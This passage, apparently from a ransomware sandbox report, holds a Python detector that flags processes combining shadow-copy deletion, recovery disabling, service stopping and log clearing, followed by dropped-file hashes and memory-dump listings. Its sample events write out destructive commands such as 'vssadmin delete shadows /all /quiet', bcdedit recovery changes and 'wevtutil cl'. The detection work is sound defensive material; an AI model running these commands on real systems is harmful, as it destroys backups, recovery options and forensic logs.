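    {"pid": 4000, "ppid": 3720, "image": r"C:\Windows\system32\vssadmin.exe",
     "cmd": r'"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet'},
    {"pid": 4010, "ppid": 3720, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no'},
    {"pid": 4011, "ppid": 3720, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures'},
    {"pid": 4020, "ppid": 3720, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLSERVER"&&sc delete "SQLWriter"&&taskkill -f -im sqlservr.exe'},
    {"pid": 4030, "ppid": 3720, "image": r"C:\Windows\SysWOW64\net.exe", "cmd": "net stop MSExchangeIS"},
    {"pid": 4031, "ppid": 4030, "image": r"C:\Windows\SysWOW64\net1.exe",
     "cmd": r"C:\Windows\system32\net1 stop MSExchangeIS"},
    {"pid": 4040, "ppid": 3720, "image": r"C:\Windows\SysWOW64\wevtutil.exe", "cmd": 'WEVTUTIL CL "Application"'},
    # Routine administration from an unrelated process: one category alone must not be flagged.
    {"pid": 5001, "ppid": 900, "image": r"C:\Windows\system32\net.exe", "cmd": "net stop Spooler"},
]

def _unquote(tok: str) -> str:
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok

def _tool_name(tok: str) -> str:
    base = _unquote(tok).replace("/", "\\").rsplit("\\", 1)[-1].lower()  # path- and case-insensitive
    return base[:-4] if base.endswith(".exe") else base

def extract_commands(cmdline: str) -> list[list[str]]:
    """Tokenise a command line; unwrap 'cmd /c a && b' into its chained simple commands.
    Chain operators inside quoted arguments are not handled (the report's lines never quote them)."""
    tokens = TOKEN.findall(cmdline)
    if tokens and _tool_name(tokens[0]) == "cmd":
        for i, tok in enumerate(tokens[1:], start=1):
            if tok.lower() in ("/c", "/k"):
                inner = " ".join(tokens[i + 1:])
                return [TOKEN.findall(seg) for seg in CHAIN_SPLIT.split(inner) if seg]
        return []  # cmd.exe without a payload
    return [tokens] if tokens else []

def classify(tokens: list[str]) -> str | None:
    """Map one simple command to a category, or None for benign/recon use of the same tools."""
    if not tokens:
        return None
    tool, args = _tool_name(tokens[0]), [_unquote(t).lower() for t in tokens[1:]]
    if tool == "vssadmin" and "delete" in args and "shadows" in args:
        return INHIBIT_RECOVERY  # 'vssadmin list shadows' falls through
    if tool == "bcdedit" and "/set" in args and (("recoveryenabled" in args and "no" in args)
                                                or ("bootstatuspolicy" in args and "ignoreallfailures" in args)):
        return INHIBIT_RECOVERY
    if tool == "wevtutil" and args and args[0] in ("cl", "clear-log"):
        return CLEAR_LOGS  # 'wevtutil el' / 'qe' only enumerate or query
    if tool in ("net", "net1") and args[:1] == ["stop"]:
        return SERVICE_STOP
    if tool == "sc" and args[:1] in (["stop"], ["delete"]):
        return SERVICE_STOP
    if tool == "taskkill" and any(a in ("/f", "-f") for a in args):
        return PROCESS_KILL
    return None

@dataclass
class Finding:
    categories: set = field(default_factory=set)
    evidence: set = field(default_factory=set)  # (category, tool, args) tuples, de-duplicated

    @property
    def flagged(self) -> bool:
        return len(self.categories) >= 2  # one category alone is ordinary administration

def _origin(event: dict, by_pid: dict) -> int:
    """Climb through cmd/net/net1 relays to the process that actually drove the activity."""
    pid = event["ppid"]
    while pid in by_pid and _tool_name(by_pid[pid]["image"]) in LAUNCHERS:
        pid = by_pid[pid]["ppid"]
    return pid

def analyze(events: list[dict]) -> dict[int, Finding]:
    by_pid = {e["pid"]: e for e in events}
    findings: dict[int, Finding] = defaultdict(Finding)
    for e in events:
        for tokens in extract_commands(e["cmd"]):
            cat = classify(tokens)
            if cat is None:
                continue
            tool = _tool_name(tokens[0])
            tool = "net" if tool == "net1" else tool  # net.exe and its net1.exe child carry the same command
            f = findings[_origin(e, by_pid)]
            f.categories.add(cat)
            f.evidence.add((cat, tool, tuple(_unquote(t).lower() for t in tokens[1:])))
    return dict(findings)
```

On the constructed events, analyze(SAMPLE_EVENTS) returns origin 3720 flagged with all four categories and eight distinct pieces of evidence, and origin 900 with a single service stop and no flag. A "Clears Windows event logs" hit can also be corroborated from the host's own records: clearing the Security log writes Event ID 1102 to Security, and clearing any other channel writes Event ID 104 to the System log, so the clearing itself leaves a trace the sample cannot remove without clearing those logs in turn.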
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Defense Evasion
- Indicator Removal on Host: 1
- File Deletion: 2
- Impair Defenses: 1
- File Permissions Modification: 1
- Modify Registry: 1
Downloads
C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt
  Filesize  1KB
  MD5       60bdfcf30bfca987709978d5ab14992a
  SHA1      aed3522cc0d6380927aade25a2c32a847da43e9a
  SHA256    e86627865f09510ca6b75530be9a272d5543f116ac883907850f62b8389a7727
  SHA512    3de54a57f3752e57118fb8c407dffba20234ef8a5b0918d97eb949feeee7c631a73feb4d4e5bad1755701a8f0770d5b0266228302a73fe8330b663bfb7fe6322

C:\Users\Admin\AppData\Local\Temp\Wvjrrzxdkill$-arab.bat
  Filesize  53KB
  MD5       b57545cb36ef6a19fdde4b2208ebb225
  SHA1      1d319740835ff12562e04cc74545a047bba63031
  SHA256    445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
  SHA512    3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyorghvc.pru.ps1
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
Memory dumps (PID-sequence-address range; Filesize):
memory/3140-134-0x0000000005D50000-0x00000000062F4000-memory.dmp    5.6MB
memory/3140-135-0x0000000005690000-0x0000000005722000-memory.dmp    584KB
memory/3140-136-0x0000000005940000-0x0000000005950000-memory.dmp    64KB
memory/3140-137-0x0000000005660000-0x000000000566A000-memory.dmp    40KB
memory/3140-138-0x0000000007270000-0x0000000007292000-memory.dmp    136KB
memory/3140-133-0x0000000000C10000-0x0000000000C9A000-memory.dmp    552KB
memory/3140-158-0x0000000005940000-0x0000000005950000-memory.dmp    64KB
memory/3720-193-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-195-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-13075-0x0000000000400000-0x000000000042B000-memory.dmp  172KB
memory/3720-2779-0x0000000000400000-0x000000000042B000-memory.dmp   172KB
memory/3720-1380-0x0000000000400000-0x000000000042B000-memory.dmp   172KB
memory/3720-198-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-197-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-196-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-183-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-184-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-185-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-168-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-169-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-171-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-172-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-194-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-174-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-177-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-178-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-179-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-180-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-182-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-190-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-192-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-189-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/3720-186-0x0000000000400000-0x000000000042B000-memory.dmp    172KB
memory/4160-147-0x00000000056D0000-0x0000000005736000-memory.dmp    408KB
memory/4160-141-0x0000000004FC0000-0x0000000005026000-memory.dmp    408KB
memory/4160-148-0x0000000002340000-0x0000000002350000-memory.dmp    64KB
memory/4160-161-0x0000000002340000-0x0000000002350000-memory.dmp    64KB
memory/4160-160-0x0000000002340000-0x0000000002350000-memory.dmp    64KB
memory/4160-159-0x0000000002340000-0x0000000002350000-memory.dmp    64KB
memory/4160-140-0x0000000005030000-0x0000000005658000-memory.dmp    6.2MB
memory/4160-157-0x00000000061C0000-0x00000000061DA000-memory.dmp    104KB
memory/4160-156-0x0000000002340000-0x0000000002350000-memory.dmp    64KB
memory/4160-139-0x00000000023A0000-0x00000000023D6000-memory.dmp    216KB
memory/4160-155-0x0000000007330000-0x00000000079AA000-memory.dmp    6.5MB
memory/4160-154-0x0000000005CE0000-0x0000000005CFE000-memory.dmp    120KB
memory/4160-153-0x0000000002340000-0x0000000002350000-memory.dmp    64KB